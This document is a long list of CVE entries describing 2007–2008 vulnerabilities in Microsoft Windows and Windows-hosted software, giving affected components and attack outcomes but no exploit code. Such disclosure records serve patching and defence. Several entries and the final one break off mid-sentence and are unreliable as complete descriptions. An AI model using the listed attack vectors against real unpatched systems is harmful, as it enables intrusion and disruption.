[CVE-2008-0088] Unspecified vulnerability in Active Directory on Microsoft Windows 2000 and Windows Server 2003, and Active Directory Application Mode (ADAM) on XP and Server 2003, allows remote attackers to cause a denial of service (hang and restart) via a crafted LDAP request. [CVE-2008-0087] The DNS client in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, and Vista uses predictable DNS transaction IDs, which allows remote attackers to spoof DNS responses. [CVE-2008-0084] Unspecified vulnerability in the TCP/IP support in Microsoft Windows Vista allows remote DHCP servers to cause a denial of service (hang and restart) via a crafted DHCP packet. [CVE-2008-0083] The (1) VBScript (VBScript.dll) and (2) JScript (JScript.dll) scripting engines 5.1 and 5.6, as used in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, do not properly decode script, which allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2008-0080] Heap-based buffer overflow in the WebDAV Mini-Redirector in Microsoft Windows XP SP2, Server 2003 SP1 and SP2, and Vista allows remote attackers to execute arbitrary code via a crafted WebDAV response. [CVE-2008-0020] Unspecified vulnerability in the Load method in the IPersistStreamInit interface in the Active Template Library (ATL), as used in the Microsoft Video ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via unknown vectors that trigger memory corruption, aka "ATL Header Memcopy Vulnerability," a different vulnerability than CVE-2008-0015. [CVE-2008-0015] Stack-based buffer overflow in the CComVariant::ReadFromStream function in the Active Template Library (ATL), as used in the MPEG2TuneRequest ActiveX control in msvidctl.dll in DirectShow, in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted web page, as exploited in the wild in July 2009, aka "Microsoft Video ActiveX Control Vulnerability." [CVE-2007-6753] Untrusted search path vulnerability in Shell32.dll in Microsoft Windows 2000, Windows XP, Windows Vista, Windows Server 2008, and Windows 7, when using an environment configured with a string such as %APPDATA% or %PROGRAMFILES% in a certain way, allows local users to gain privileges via a Trojan horse DLL under the current working directory, as demonstrated by iTunes and Safari. [CVE-2007-6701] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP4 for Windows allow remote attackers to execute arbitrary code via long arguments to multiple unspecified RPC functions, aka Novell bug 287919, a different vulnerability than CVE-2007-2954. [CVE-2007-6507] SpntSvc.exe daemon in Trend Micro ServerProtect 5.58 for Windows, before Security Patch 4, exposes unspecified dangerous sub-functions from StRpcSrv.dll in the DCE/RPC interface, which allows remote attackers to obtain "full file system access" and execute arbitrary code. [CVE-2007-6401] Stack-based buffer overflow in mplayer2.exe in Microsoft Windows Media Player (WMP) 6.4, when used with the 3ivx 4.5.1 or 5.0.1 codec, allows remote attackers to execute arbitrary code via a certain .mp4 file, possibly a related issue to CVE-2007-6402. [CVE-2007-6332] The HPInfoDLL.HPInfo.1 ActiveX control in HPInfoDLL.dll 1.0, as shipped with HP Info Center (hpinfocenter.exe) 1.0.1.1 in HP Quick Launch Button (QLBCTRL.exe, aka QLB) 6.3 and earlier, on Microsoft Windows before Vista allows remote attackers to create or modify arbitrary registry values via the arguments to the SetRegValue method. [CVE-2007-6236] Microsoft Windows Media Player (WMP) allows remote attackers to cause a denial of service (application crash) via a certain AIFF file that triggers a divide-by-zero error, as demonstrated by kr.aiff. [CVE-2007-6043] The CryptGenRandom function in Microsoft Windows 2000 generates predictable values, which makes it easier for context-dependent attackers to reduce the effectiveness of cryptographic mechanisms, as demonstrated by attacks on (1) forward security and (2) backward security, related to use of eight instances of the RC4 cipher, and possibly a related issue to CVE-2007-3898. [CVE-2007-5634] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, does not properly check a buffer during an IOCTL 0x9c402420 call, which allows local users to cause a denial of service (machine crash) and possibly gain privileges via unspecified vectors. [CVE-2007-5633] Speedfan.sys in Alfredo Milani Comparetti SpeedFan 4.33, when used on Microsoft Windows Vista x64, allows local users to read or write arbitrary MSRs, and gain privileges and load unsigned drivers, via the (1) IOCTL_RDMSR 0x9C402438 and (2) IOCTL_WRMSR 0x9C40243C IOCTLs to \Device\speedfan, as demonstrated by an IOCTL_WRMSR action on MSR_LSTAR. [CVE-2007-5587] Buffer overflow in Macrovision SafeDisc secdrv.sys before 4.3.86.0, as shipped in Microsoft Windows XP SP2, XP Professional x64 and x64 SP2, Server 2003 SP1 and SP2, and Server 2003 x64 and x64 SP2 allows local users to overwrite arbitrary memory locations and gain privileges via a crafted argument to a METHOD_NEITHER IOCTL, as originally discovered in the wild. [CVE-2007-5460] Microsoft ActiveSync 4.1, as used in Windows Mobile 5.0, uses weak encryption (XOR obfuscation with a fixed key) when sending the user's PIN/Password over the USB connection from the host to the device, which might make it easier for attackers to decode a PIN/Password obtained by (1) sniffing or (2) spoofing the docking process. [CVE-2007-5352] Unspecified vulnerability in Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows local users to gain privileges via a crafted local procedure call (LPC) request. [CVE-2007-5351] Unspecified vulnerability in Server Message Block Version 2 (SMBv2) signing support in Microsoft Windows Vista allows remote attackers to force signature re-computation and execute arbitrary code via a crafted SMBv2 packet, aka "SMBv2 Signing Vulnerability." [CVE-2007-5350] Unspecified vulnerability in the Windows Advanced Local Procedure Call (ALPC) in the kernel in Microsoft Windows Vista allows local users to gain privileges via unspecified vectors involving "legacy reply paths." [CVE-2007-5348] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via an image file with crafted gradient sizes in gradient fill input, which triggers a heap-based buffer overflow related to GdiPlus.dll and VGX.DLL, aka "GDI+ VML Buffer Overrun Vulnerability." [CVE-2007-5145] Multiple buffer overflows in system DLL files in Microsoft Windows XP, as used by Microsoft Windows Explorer (explorer.exe) 6.00.2900.2180, Don Ho Notepad++, unspecified Adobe Macromedia applications, and other programs, allow user-assisted remote attackers to cause a denial of service (application crash) via long strings in the (1) author, (2) title, (3) subject, and (4) comment Properties fields of a file, possibly involving improper handling of extended file attributes by the (a) NtQueryInformationFile, (b) NtQueryDirectoryFile, (c) NtSetInformationFile, (d) FileAllInformation, (e) FileNameInformation, and other FILE_INFORMATION_CLASS functions in ntdll.dll and the (f) GetFileAttributesExW and (g) GetFileAttributesW functions in kernel32.dll, a related issue to CVE-2007-1347. [CVE-2007-5133] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service (CPU consumption) via a certain PNG file with a large tEXt chunk that possibly triggers an integer overflow in PNG chunk size handling, as demonstrated by badlycrafted.png. [CVE-2007-5095] Microsoft Windows Media Player (WMP) 9 on Windows XP SP2 invokes Internet Explorer to render HTML documents contained inside some media files, regardless of what default web browser is configured, which might allow remote attackers to exploit vulnerabilities in software that the user does not expect to run, as demonstrated by the HTMLView parameter in an .asx file. [CVE-2007-4490] Multiple buffer overflows in EarthAgent.exe in Trend Micro ServerProtect 5.58 for Windows before Security Patch 4 allow remote attackers to have an unknown impact via certain RPC function calls to (1) RPCFN_EVENTBACK_DoHotFix or (2) CMD_CHANGE_AGENT_REGISTER_INFO. [CVE-2007-4414] Cisco VPN Client on Windows before 4.8.02.0010 allows local users to gain privileges by enabling the "Start Before Logon" (SBL) and Microsoft Dial-Up Networking options, and then interacting with the dial-up networking dialog box. [CVE-2007-4288] Microsoft Windows Media Player 11 (wmplayer.exe) allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .au file that triggers a divide-by-zero error, as demonstrated by iapetus.au. [CVE-2007-4247] Windows Calendar on Microsoft Windows Vista allows remote attackers to cause a denial of service (NULL dereference and persistent application crash) via a malformed ICS file. [CVE-2007-4227] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain JPG file, as demonstrated by something.jpg. NOTE: this issue might be related to CVE-2007-3958. [CVE-2007-4219] Integer overflow in the RPCFN_SYNC_TASK function in StRpcSrv.dll, as used by the ServerProtect service (SpntSvc.exe), in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allows remote attackers to execute arbitrary code via a certain integer field in a request packet to TCP port 5168, which triggers a heap-based buffer overflow. [CVE-2007-4218] Multiple buffer overflows in the ServerProtect service (SpntSvc.exe) in Trend Micro ServerProtect for Windows before 5.58 Security Patch 4 allow remote attackers to execute arbitrary code via certain RPC requests to certain TCP ports that are processed by the (1) RPCFN_ENG_NewManualScan, (2) RPCFN_ENG_TimedNewManualScan, and (3) RPCFN_SetComputerName functions in (a) StRpcSrv.dll [CVE-2007-3958] Microsoft Windows Explorer (explorer.exe) allows user-assisted remote attackers to cause a denial of service via a certain GIF file, as demonstrated by Art.gif. [CVE-2007-3898] The DNS server in Microsoft Windows 2000 Server SP4, and Server 2003 SP1 and SP2, uses predictable transaction IDs when querying other DNS servers, which allows remote attackers to spoof DNS replies, poison the DNS cache, and facilitate further attack vectors. [CVE-2007-3897] Heap-based buffer overflow in Microsoft Outlook Express 6 and earlier, and Windows Mail for Vista, allows remote Network News Transfer Protocol (NNTP) servers to execute arbitrary code via long NNTP responses that trigger memory corruption. [CVE-2007-3896] The URL handling in Shell32.dll in the Windows shell in Microsoft Windows XP and Server 2003, with Internet Explorer 7 installed, allows remote attackers to execute arbitrary programs via invalid "%" sequences in a mailto: or other URI handler, as demonstrated using mIRC, Outlook, Firefox, Adobe Reader, Skype, and other applications. NOTE: this issue might be related to other issues involving URL handlers in Windows systems, such as CVE-2007-3845. There also might be separate but closely related issues in the applications that are invoked by the handlers. [CVE-2007-3826] Microsoft Internet Explorer 7 on Windows XP SP2 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via repeated document.open function calls after a user requests a new page, but before the onBeforeUnload function is called. [CVE-2007-3724] The process scheduler in the Microsoft Windows XP kernel does not make use of the process statistics kept by the kernel, performs scheduling based on CPU billing gathered from periodic process sampling ticks, and gives preference to "interactive" processes that perform voluntary sleeps, which allows local users to cause a denial of service (CPU consumption), as described in "Secretly Monopolizing the CPU Without Superuser Privileges." [CVE-2007-3671] Unspecified vulnerability in the kernel in Microsoft Windows Vista has unspecified remote attack vectors and impact, as shown in the "0day IPO" presentation at SyScan'07. [CVE-2007-3509] Heap-based buffer overflow in the RPC subsystem in Symantec Backup Exec for Windows Servers 10.0, 10d, and 11d allows remote attackers to cause a denial of service (process exit) and possibly execute arbitrary code via crafted ncacn_ip_tcp requests. [CVE-2007-3463] DISPUTED Microsoft Windows XP SP2 allows local users, who have sessions created by another user's RunAs (run as) command, to kill arbitrary processes of this other user, as demonstrated by the taskkill program. NOTE: the researcher claims a vendor dispute in which the vendor states that "RunAs and UAC are convenience features, not security boundaries. If you need a security guarantee, please log out and log back in with a different account." [CVE-2007-3436] Microsoft MSN Messenger 4.7 on Windows XP allows remote attackers to cause a denial of service (resource consumption) via a flood of SIP INVITE requests to the port specified for voice conversation. [CVE-2007-3406] Multiple absolute path traversal vulnerabilities in Microsoft Internet Explorer 6 on Windows XP SP2 allow remote attackers to access arbitrary local files via the file: URI in the (1) src attribute of a (a) bgsound, (b) input, (c) EMBED, (d) img, or (e) script tag [CVE-2007-3300] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070619 allow remote attackers to bypass scanning via a crafted header in a (1) LHA or (2) RAR archive. [CVE-2007-3040] Stack-based buffer overflow in agentdpv.dll 2.0.0.3425 in Microsoft Agent on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a crafted URL to the Agent (Agent.Control) ActiveX control, which triggers an overflow within the Agent Service (agentsrv.exe) process, a different issue than CVE-2007-1205. [CVE-2007-3038] The Teredo interface in Microsoft Windows Vista and Vista x64 Edition does not properly handle certain network traffic, which allows remote attackers to bypass firewall blocking rules and obtain sensitive information via crafted IPv6 traffic, aka "Windows Vista Firewall Blocking Rule Information Disclosure Vulnerability." [CVE-2007-3037] Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that causes a size mismatch between compressed and decompressed data and triggers a heap-based buffer overflow, aka "Windows Media Player Code Execution Vulnerability Parsing Skins." [CVE-2007-3036] Unspecified vulnerability in the (1) Windows Services for UNIX 3.0 and 3.5, and (2) Subsystem for UNIX-based Applications in Microsoft Windows 2000, XP, Server 2003, and Vista allows local users to gain privileges via unspecified vectors related to "certain setuid binary files." [CVE-2007-3035] Unspecified vulnerability in Microsoft Windows Media Player 7.1, 9, 10, and 11 allows remote attackers to execute arbitrary code via a skin file (WMZ or WMD) with crafted header information that is not properly handled during decompression, aka "Windows Media Player Code Execution Vulnerability Decompressing Skins." [CVE-2007-3034] Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow. [CVE-2007-3028] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4 does not properly check "the number of convertible attributes", which allows remote attackers to cause a denial of service (service unavailability) via a crafted LDAP request, related to "client sent LDAP request logic," aka "Windows Active Directory Denial of Service Vulnerability". NOTE: this is probably a different issue than CVE-2007-0040. [CVE-2007-2999] Microsoft Windows Server 2003, when time restrictions are in effect for user accounts, generates different error messages for failed login attempts with a valid user name than for those with an invalid user name, which allows context-dependent attackers to determine valid Active Directory account names. [CVE-2007-2967] Multiple F-Secure anti-virus products for Microsoft Windows and Linux before 20070522 allow remote attackers to cause a denial of service (file scanning infinite loop) via certain crafted (1) ARJ archives or (2) FSG packed files. [CVE-2007-2966] Buffer overflow in the LHA decompresion component in F-Secure anti-virus products for Microsoft Windows and Linux before 20070529 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted LHA archive, related to an integer wrap, a similar issue to CVE-2006-4335. [CVE-2007-2954] Multiple stack-based buffer overflows in the Spooler service (nwspool.dll) in Novell Client 4.91 SP2 through SP4 for Windows allow remote attackers to execute arbitrary code via certain long arguments to the (1) RpcAddPrinterDriver, (2) RpcGetPrinterDriverDirectory, and other unspecified RPC requests, aka Novell bug 300870, a different vulnerability than CVE-2006-5854. [CVE-2007-2815] The "hit-highlighting" functionality in webhits.dll in Microsoft Internet Information Services (IIS) Web Server 5.0 only uses Windows NT ACL configuration, which allows remote attackers to bypass NTLM and basic authentication mechanisms and access private web directories via the CiWebhitsfile parameter to null.htw. [CVE-2007-2730] Check Point ZoneAlarm Pro before 6.5.737.000 does not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2729] Comodo Firewall Pro 2.4.18.184 and Comodo Personal Firewall 2.3.6.81, and probably older Comodo Firewall versions, do not properly test for equivalence of process identifiers for certain Microsoft Windows API functions in the NT kernel 5.0 and greater, which allows local users to call these functions, and bypass firewall rules or gain privileges, via a modified identifier that is one, two, or three greater than the canonical identifier. [CVE-2007-2593] The Terminal Server in Microsoft Windows 2003 Server, when using TLS, allows remote attackers to bypass SSL and self-signed certificate requirements, downgrade the server security, and possibly conduct man-in-the-middle attacks via unspecified vectors, as demonstrated using the Remote Desktop Protocol (RDP) 6.0 client. NOTE: a third party claims that the vendor may have fixed this in approximately 2006. [CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx. [CVE-2007-2528] Buffer overflow in AgRpcCln.dll for Trend Micro ServerProtect 5.58 for Windows before Security Patch 3 Build 1176 allows remote attackers to execute arbitrary code via unknown vectors related to RPC requests. NOTE: this is probably a different vulnerability than CVE-2007-2508. [CVE-2007-2374] Unspecified vulnerability in Microsoft Windows 2000, XP, and Server 2003 allows user-assisted remote attackers to execute arbitrary code via unspecified vectors. NOTE: this information is based upon a vague pre-advisory with no actionable information. However, the advisory is from a reliable source. [CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error. [CVE-2007-2229] Microsoft Windows Vista uses insecure default permissions for unspecified "local user information data stores" in the registry and the file system, which allows local users to obtain sensitive information such as administrative passwords, aka "Permissive User Information Store ACLs Information Disclosure Vulnerability." [CVE-2007-2227] The MHTML protocol handler in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle Content-Disposition "notifications," which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "Content Disposition Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2225] A component in Microsoft Outlook Express 6 and Windows Mail in Windows Vista does not properly handle certain HTTP headers when processing MHTML protocol URLs, which allows remote attackers to obtain sensitive information from other Internet Explorer domains, aka "URL Parsing Cross Domain Information Disclosure Vulnerability." [CVE-2007-2224] Object linking and embedding (OLE) Automation, as used in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Office 2004 for Mac, and Visual Basic 6.0 allows remote attackers to execute arbitrary code via the substringData method on a TextNode object, which causes an integer overflow that leads to a buffer overflow. [CVE-2007-2221] Unspecified vulnerability in the mdsauth.dll COM object in Microsoft Windows Media Server in the Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-2219] Unspecified vulnerability in the Win32 API on Microsoft Windows 2000, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via certain parameters to an unspecified function. [CVE-2007-2218] Unspecified vulnerability in the Windows Schannel Security Package for Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2, allows remote servers to execute arbitrary code or cause a denial of service via crafted digital signatures that are processed during an SSL handshake. [CVE-2007-2217] Kodak Image Viewer in Microsoft Windows 2000 SP4, and in some cases XP SP2 and Server 2003 SP1 and SP2, allows remote attackers to execute arbitrary code via crafted image files that trigger memory corruption, as demonstrated by a certain .tif (TIFF) file. [CVE-2007-1973] Race condition in the Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 allows local users to modify memory and gain privileges via the temporary \Device\PhysicalMemory section handle, a related issue to CVE-2007-1206. [CVE-2007-1946] Integer overflow in Windows Explorer in Microsoft Windows XP SP1 might allow user-assisted remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large width dimension in a crafted BMP image, as demonstrated by w4intof.bmp. [CVE-2007-1912] Heap-based buffer overflow in Microsoft Windows allows user-assisted remote attackers to have an unknown impact via a crafted .HLP file. [CVE-2007-1765] Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038 [CVE-2007-1763] The ATI kernel driver (atikmdag.sys) in Microsoft Windows Vista allows user-assisted remote attackers to cause a denial of service (crash) via a crafted JPG image, as demonstrated by a slideshow, possibly due to a buffer overflow. [CVE-2007-1692] The default configuration of Microsoft Windows uses the Web Proxy Autodiscovery Protocol (WPAD) without static WPAD entries, which might allow remote attackers to intercept web traffic by registering a proxy server using WINS or DNS, then responding to WPAD requests, as demonstrated using Internet Explorer. NOTE: it could be argued that if an attacker already has control over WINS/DNS, then web traffic could already be intercepted by modifying WINS or DNS records, so this would not cross privilege boundaries and would not be a vulnerability. It has also been reported that DHCP is an alternate attack vector. [CVE-2007-1658] Windows Mail in Microsoft Windows Vista might allow user-assisted remote attackers to execute certain programs via a link to a (1) local file or (2) UNC share pathname in which there is a directory with the same base name as an executable program at the same level, as demonstrated using C:/windows/system32/winrm (winrm.cmd) and migwiz (migwiz.exe). [CVE-2007-1645] Buffer overflow in FutureSoft TFTP Server 2000 on Microsoft Windows 2000 SP4 allows remote attackers to execute arbitrary code via a long request on UDP port 69. NOTE: this issue might overlap CVE-2006-4781 or CVE-2005-1812. [CVE-2007-1644] The dynamic DNS update mechanism in the DNS Server service on Microsoft Windows does not properly authenticate clients in certain deployments or configurations, which allows remote attackers to change DNS records for a web proxy server and conduct man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-1070] Multiple stack-based buffer overflows in Trend Micro ServerProtect for Windows and EMC 5.58, and for Network Appliance Filer 5.61 and 5.62, allow remote attackers to execute arbitrary code via crafted RPC requests to TmRpcSrv.dll that trigger overflows when calling the (1) CMON_NetTestConnection, (2) CMON_ActiveUpdate, and (3) CMON_ActiveRollback functions in (a) StCommon.dll, and (4) ENG_SetRealTimeScanConfigInfo and (5) ENG_SendEMail functions in (b) eng50.dll. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long 